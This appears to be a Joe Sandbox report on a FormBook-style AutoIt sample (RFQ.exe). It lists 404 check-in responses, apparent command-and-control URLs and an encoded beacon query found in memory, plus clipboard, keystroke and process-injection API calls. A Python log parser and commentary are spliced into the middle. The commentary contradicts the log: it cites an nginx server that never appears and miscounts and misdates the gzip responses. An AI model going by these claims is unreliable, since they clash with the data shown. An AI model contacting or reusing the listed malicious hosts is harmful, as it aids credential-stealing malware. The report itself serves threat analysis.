                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:07 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:10 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:12 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:14 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:17 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:19 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:22 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: enUILRNjDql.exe, 00000006.00000002.4574678267.0000000004F25000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.marketprediction.app
                Source: enUILRNjDql.exe, 00000006.00000002.4574678267.0000000004F25000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.marketprediction.app/ucmb/
                Source: net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yushaliu.online/px.js?ch=1
                Source: net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yushaliu.online/px.js?ch=2
                Source: net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yushaliu.online/sk-logabpstatus.php?a=NlFjSUtLSnllS1JFblBWQWdKcys3ZzRjSzh6dkNqL1JnUEMzQWh
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000004.00000003.2476536120.0000000008161000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 00000004.00000002.4573862454.0000000004286000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000002FE6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: net.exe, 00000004.00000002.4573862454.0000000004BF2000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003952000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000004.00000002.4573862454.0000000004286000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000004BF2000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000002FE6000.00000004.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003952000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.gandi.net/en/domain
                Source: net.exe, 00000004.00000002.4573862454.0000000004418000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.00000000045AA000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.000000000330A000.00000004.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003178000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00786B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00786B0C
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00786D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00786D07
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00786B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00786B0C
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00772B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00772B37
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_0079F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0079F7FF
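                The HTTP findings above are the sandbox's view of the sample's check-ins: every request drew a 404, from three different server stacks (stock Apache, nginx with its MSIE padding comments, an Apache/2.2.22 Win64 build with PHP/5.3.13), and the three Apache responses at 14:42:05 to 14:42:10 are gzip-encoded, so their "Data Ascii" column shows only compressed bytes. The paths the servers echo back (/9ezc/, /95c0/) and the /ucmb/ string in memory are all single four-character directories. A 404 here is not evidence that the infrastructure is dead: FormBook configurations carry decoy domains alongside the real one, so the live host has to be picked out of the list rather than assumed from the first hit. The Python below is an added example, not part of the Joe Sandbox report, that parses a finding line in this collapsed format, recovers the body from the "Data Raw" hex, gunzips it when Content-Encoding says so, and pulls out the Server header and the path echoed in the 404 page. The function names, the `short_dir_path` heuristic and the two finding lines it runs on are mine; the lines are constructed by `build_finding_line` (the gzip body is generated at run time) and the hosts are placeholders, not taken from the report.

```python
"""Parse a Joe Sandbox 'HTTP traffic detected' finding line and recover the
response body. Added example; the log lines used here are constructed in
build_finding_line(), not copied from the report."""
import gzip
import re
from dataclasses import dataclass
from typing import Dict, Optional

# The sandbox column runs the response headers together without CRLFs
# ("...GMTServer: ApacheVary: ..."), so known header names act as boundaries.
HEADER_NAMES = ("Date", "Server", "Vary", "Content-Encoding",
                "Content-Length", "Connection", "Content-Type")
_BOUNDARY = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))


@dataclass
class HttpFinding:
    status: int
    headers: Dict[str, str]
    body: str                      # decoded (and gunzipped) response body
    requested_path: Optional[str]  # path echoed by the 404 page, if any


def split_headers(blob: str) -> Dict[str, str]:
    """Split 'Date: ...GMTServer: ApacheVary: ...' into a header dict."""
    headers: Dict[str, str] = {}
    for part in _BOUNDARY.split(blob):
        name, sep, value = part.partition(": ")
        if sep and name in HEADER_NAMES:
            headers[name] = value.strip()
    return headers


def parse_http_finding(line: str) -> HttpFinding:
    head, _, rest = line.partition("Data Raw: ")
    status = re.search(r"HTTP/1\.\d (\d{3})", head)
    if not status:
        raise ValueError("no HTTP status line in finding")
    headers = split_headers(head[status.end():])
    # Everything between 'Data Raw:' and 'Data Ascii:' is the body as hex pairs.
    raw = bytes.fromhex(rest.partition("Data Ascii:")[0].strip())
    if headers.get("Content-Encoding", "").lower() == "gzip":
        raw = gzip.decompress(raw)   # the Data Ascii column is useless for these
    charset = re.search(r"charset=([\w-]+)", headers.get("Content-Type", ""))
    body = raw.decode(charset.group(1) if charset else "iso-8859-1", errors="replace")
    path = re.search(r"The requested URL (/\S*?) was not found", body)
    return HttpFinding(int(status.group(1)), headers, body,
                       path.group(1) if path else None)


def short_dir_path(path: Optional[str]) -> bool:
    """Heuristic (mine, not a vendor signature): a single four-character
    alphanumeric directory, the shape of /ucmb/, /9ezc/ and /95c0/ above."""
    return bool(path) and re.fullmatch(r"/[a-z0-9]{4}/", path) is not None


def build_finding_line(server: str, body_html: str, gzip_body: bool,
                       date: str = "Thu, 14 Nov 2024 14:42:05 GMT") -> str:
    """Construct a finding line in the sandbox's collapsed format (test input)."""
    payload = body_html.encode("iso-8859-1")
    if gzip_body:
        payload = gzip.compress(payload, mtime=0)
    hexdump = " ".join(f"{b:02x}" for b in payload)
    printable = "".join(chr(b) if 32 <= b < 127 else "" for b in payload)
    hdrs = f"Date: {date}Server: {server}"
    if gzip_body:
        hdrs += "Vary: Accept-EncodingContent-Encoding: gzip"
    hdrs += (f"Content-Length: {len(payload)}Connection: close"
             "Content-Type: text/html; charset=iso-8859-1")
    return ("Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found"
            f"{hdrs}Data Raw: {hexdump} Data Ascii: {printable}")


if __name__ == "__main__":
    line = build_finding_line(
        "Apache", "<html><body><h1>Not Found</h1><p>The requested URL /9ezc/ "
        "was not found on this server.</p></body></html>", gzip_body=True)
    f = parse_http_finding(line)
    print(f.headers["Server"], f.requested_path, short_dir_path(f.requested_path))
```

                Run over the real lines, the parser groups the check-ins by Server header and path, which is the quickest way to tell the three server stacks apart and to list the candidate C2 paths for a block rule. `gzip.decompress` also flags truncated captures: it raises on a Data Raw dump that was cut short.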

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\RFQ.exeCode function: This is a third-party compiled AutoIt script.0_2_00733D19
                Source: RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RFQ.exe, 00000000.00000000.2107955692.00000000007DE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bd9683c7-1
                Source: RFQ.exe, 00000000.00000000.2107955692.00000000007DE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: vSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fd9ffdcc-7
                Source: RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d5de4a03-7
                Source: RFQ.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b26a78ad-f
                Source: initial sample  Static PE information: Filename: RFQ.exe
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0042CA43: NtClose
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972B60: NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972DF0: NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_039735C0: NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03974340: NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03974650: NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972B80: NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972BA0: NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972BF0: NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972BE0: NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972AB0: NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972AD0: NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972AF0: NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972F90: NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972FB0: NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972FA0: NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972FE0: NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972F30: NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972F60: NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972E80: NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972EA0: NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972EE0: NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972E30: NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972DB0: NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972DD0: NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972D10: NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972D00: NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972D30: NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972CA0: NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972CC0: NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972CF0: NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972C00: NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972C70: NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03972C60: NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03973090: NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03973010: NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_039739B0: NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03973D10: NtOpenProcessToken
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03973D70: NtOpenThread
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03754340: NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03754650: NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752B60: NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752BF0: NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752BE0: NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe  Code function: 4_2_03752BA0: NtEnumerateValueKey,LdrInitializeThunk
